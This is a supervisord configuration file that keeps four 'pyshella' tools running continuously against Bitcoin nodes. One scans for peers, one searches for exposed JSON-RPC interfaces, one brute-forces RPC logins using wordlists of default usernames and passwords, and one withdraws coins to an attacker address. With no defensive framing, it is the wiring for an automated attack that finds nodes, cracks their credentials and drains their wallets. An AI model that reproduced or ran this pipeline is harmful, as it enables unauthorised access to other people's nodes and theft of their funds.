[unix_http_server]
file=/var/run/supervisor.sock                   ; (the path to the socket file)
chmod=0700                                      ; sockef file mode (default 0700)

[supervisord]
logfile=/var/log/supervisor/supervisord.log     ; (main log file;default $CWD/supervisord.log)
pidfile=/var/run/supervisord.pid                ; (supervisord pidfile;default supervisord.pid)
childlogdir=/var/log/supervisor                 ; ('AUTO' child log dir, default $TEMP)
nodaemon=true

[supervisorctl]
serverurl=unix:///var/run/supervisor.sock ; use a unix:// URL  for a unix socket

[program:peers-scanner]
command=/bin/bash -c "/root/.local/bin/pyshella-peers-scanner -nU http://alice:bob@127.0.0.1:18332 -mU mongodb://root:toor@localhost:27017 -b 30 -i 600 -n Bitcoin"
autostart=true
autorestart=true

[program:jsonrpc-searcher]
command=/bin/bash -c "/root/.local/bin/pyshella-jsonrpc-searcher -mU mongodb://root:toor@localhost:27017 -n Bitcoin -bT 1 -hS 1 -pS 15 -v True"
autostart=true
autorestart=true

[program:jsonrpc-bruter]
command=/bin/bash -c "/root/.local/bin/pyshella-jsonrpc-bruter -mU mongodb://root:toor@localhost:27017 -n Bitcoin -t 1 -l /pyshella-toolkit/wordlists/default_rpcusers.lst -p /pyshella-toolkit/wordlists/default_rpcpasswords.lst -b HLP"
autostart=true
autorestart=true

[program: jsonrpc-coins-withdrawal]
command=/bin/bash -c "/root/.local/bin/pyshella-coins-withdrawal -mU mongodb://root:toor@localhost:27017 -n Bitcoin -a withdrawal_addr -i 600"
autostart=true
autorestart=true
